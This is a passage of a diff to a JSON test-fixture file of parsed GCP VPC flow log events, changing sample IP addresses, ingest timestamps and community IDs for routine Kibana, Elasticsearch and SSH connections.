"tcp", @@ -12937,7 +12937,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -12970,8 +12970,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868901100Z", - "original": "{\"insertId\":\"ptjoddfhmrhgq\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"86\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391889200Z", + "original": "{\"insertId\":\"ptjoddfhmrhgq\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"86\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466706102Z", "end": "2019-06-14T03:49:37.933338264Z", @@ -13000,17 +13000,17 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 41818, "bytes": 0, - "ip": "198.51.100.182", + "ip": "67.43.156.14", "packets": 4 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:+MSnEfQ6PdDGsHX0nTeNna2fZHI=", + "community_id": "1:iiFy+S+g1JJvu9kZvA1ivEiN2EM=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -13024,7 +13024,7 @@ }, "related": { "ip": [ - "198.51.100.182", + "67.43.156.14", "10.139.99.242" ] }, @@ -13049,8 +13049,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868904300Z", - "original": "{\"insertId\":\"bxuq05fhgmw9d\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"198.51.100.182\",\"src_port\":41818},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:13.478093057Z\",\"packets_sent\":\"4\",\"reporter\":\"DEST\",\"rtt_msec\":\"1350\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391895Z", + "original": "{\"insertId\":\"bxuq05fhgmw9d\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":41818},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:13.478093057Z\",\"packets_sent\":\"4\",\"reporter\":\"DEST\",\"rtt_msec\":\"1350\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:11.031370298Z", "end": "2019-06-14T03:40:13.478093057Z", @@ -13071,10 +13071,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -13088,7 +13088,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:m8TzhysIkslBtL9JjV+tquk6V/g=", + "community_id": "1:KTuz6NE5trahWJ94CUsvoASfpt8=", "bytes": 4580, "name": "default", "transport": "tcp", @@ -13111,7 +13111,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -13144,8 +13144,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868912500Z", - "original": "{\"insertId\":\"bxuq05fhgmw90\",\"jsonPayload\":{\"bytes_sent\":\"4580\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"60\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391900700Z", + "original": "{\"insertId\":\"bxuq05fhgmw90\",\"jsonPayload\":{\"bytes_sent\":\"4580\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"60\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.789945697Z", "end": "2019-06-14T03:49:56.461240929Z", @@ -13174,17 +13174,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65322, "bytes": 270437, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 668 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:tXtxtPy6IFZbzlCNEMTqkkfU37w=", + "community_id": "1:aRPYFHez0LD3jAm92mNT3UC23bE=", "bytes": 270437, "transport": "tcp", "type": "ipv4", @@ -13198,7 +13198,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -13223,8 +13223,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868915600Z", - "original": "{\"insertId\":\"bxuq05fhgmw8w\",\"jsonPayload\":{\"bytes_sent\":\"270437\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65322},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"668\",\"reporter\":\"DEST\",\"rtt_msec\":\"92\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391906300Z", + "original": "{\"insertId\":\"bxuq05fhgmw8w\",\"jsonPayload\":{\"bytes_sent\":\"270437\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65322},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"668\",\"reporter\":\"DEST\",\"rtt_msec\":\"92\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.703392247Z", "end": "2019-06-14T03:49:55.408936364Z", @@ -13247,9 +13247,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65322, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -13263,7 +13263,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:tXtxtPy6IFZbzlCNEMTqkkfU37w=", + "community_id": "1:aRPYFHez0LD3jAm92mNT3UC23bE=", "bytes": 19019, "transport": "tcp", "type": "ipv4", @@ -13278,7 +13278,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -13302,8 +13302,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868918400Z", - "original": "{\"insertId\":\"bxuq05fhgmw94\",\"jsonPayload\":{\"bytes_sent\":\"19019\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65322,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"604\",\"reporter\":\"SRC\",\"rtt_msec\":\"92\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391911700Z", + "original": "{\"insertId\":\"bxuq05fhgmw94\",\"jsonPayload\":{\"bytes_sent\":\"19019\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65322,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"604\",\"reporter\":\"SRC\",\"rtt_msec\":\"92\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.703392247Z", "end": "2019-06-14T03:49:55.408936364Z", @@ -13330,18 +13330,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 16208, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 80 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:AXYYDUibiLRs7tXVqml9vhtY2wY=", + "community_id": "1:XDhlyCx6ikMFDl8JVik4ROYVJJY=", "bytes": 16208, "name": "default", "transport": "tcp", @@ -13363,7 +13363,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -13400,8 +13400,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868921300Z", - "original": "{\"insertId\":\"bxuq05fhgmw8x\",\"jsonPayload\":{\"bytes_sent\":\"16208\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391917200Z", + "original": "{\"insertId\":\"bxuq05fhgmw8x\",\"jsonPayload\":{\"bytes_sent\":\"16208\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.455711202Z", "end": "2019-06-14T03:49:51.789269849Z", @@ -13422,10 +13422,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -13439,7 +13439,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AXYYDUibiLRs7tXVqml9vhtY2wY=", + "community_id": "1:XDhlyCx6ikMFDl8JVik4ROYVJJY=", "bytes": 9800, "name": "default", "transport": "tcp", @@ -13462,7 +13462,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -13498,8 +13498,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868924300Z", - "original": "{\"insertId\":\"bxuq05fhgmw8v\",\"jsonPayload\":{\"bytes_sent\":\"9800\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391922600Z", + "original": "{\"insertId\":\"bxuq05fhgmw8v\",\"jsonPayload\":{\"bytes_sent\":\"9800\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.455711202Z", "end": "2019-06-14T03:49:51.789269849Z", @@ -13526,17 +13526,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58026, "bytes": 1467, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:iqLE2ZKPjY+4CpYdTYZLcB7D1xk=", + "community_id": "1:GlCQ5a9VOJVReAwOuh722hRVrD0=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -13550,7 +13550,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, @@ -13575,8 +13575,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868927200Z", - "original": "{\"insertId\":\"bxuq05fhgmw8z\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":58026},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"40\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391928100Z", + "original": "{\"insertId\":\"bxuq05fhgmw8z\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58026},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"40\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:49:08.995009558Z", "end": "2019-06-14T03:49:09.114674887Z", @@ -13603,18 +13603,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 19506, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 180 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:d+9cs8ZSIwCZUTV/HN9P0arhfqU=", + "community_id": "1:xK6qqvSvQC9vUS1J4R94Va2tqkE=", "bytes": 19506, "name": "default", "transport": "tcp", @@ -13636,7 +13636,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -13670,8 +13670,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868930100Z", - "original": 